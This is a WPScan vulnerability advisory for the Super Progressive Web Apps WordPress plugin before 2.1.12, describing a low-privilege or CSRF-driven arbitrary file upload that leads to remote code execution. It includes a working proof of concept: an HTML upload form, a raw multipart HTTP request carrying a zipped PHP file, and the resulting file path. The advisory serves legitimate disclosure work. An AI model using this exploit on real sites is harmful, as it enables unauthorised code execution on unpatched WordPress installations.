WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Super Progressive Web Apps < 2.1.12 - Authenticated (Low Privileged) Arbitrary File Upload to RCE

Description

When the Apple Touch Icons & Splash Screen add-on is active, its superpwa_splashscreen_uploader AJAX action, does not properly check for CSRF, authorisation and the content of the uploaded archive file. This allows attackers to upload an archive with a PHP file, leading to RCE by either using a low privilege account (subscriber+) or a CSRF attack on any logged in user.

v2.1.11 fixed the CSRF check, only. v2.1.12 added capability check.

Proof of Concept

Login to the blog as a low privilege user (such as subscriber), save the code below in an HTML file (and replace the example.com by the correct domain), then open it in the same browser used to log on to the blog and select an archive of a PHP file

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
    Zipped PHP File
    <input type="file" name="file"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42382098251599243971534803211
Content-Length: 595
Connection: close
Cookie: [low privilege cookies]
Upgrade-Insecure-Requests: 1

-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="action"

superpwa_splashscreen_uploader
-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="file"; filename="134.zip"
Content-Type: application/zip

PK���‰IE������������ �134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�õ�����³±/È(PHMÎÈWPwsôôquQ·V°·ã�PK^Ý}u������PK���‰IE^Ý}u������� ���������ÿ����134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�õ�����PK������\���v�����
-----------------------------42382098251599243971534803211--


PHP will be at https://example.com/wp-content/uploads/superpwa-splashIcons/134-zipped.php 

Affects Plugins

super-progressive-web-apps
Fixed in version 2.1.12

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
4fd989ae-db35-40fa-ba61-b2d4fbb3994d

Timeline

Publicly Published

2021-06-29 (about 1 years ago)

Added

2021-06-29 (about 1 years ago)

Last Updated

2021-06-29 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us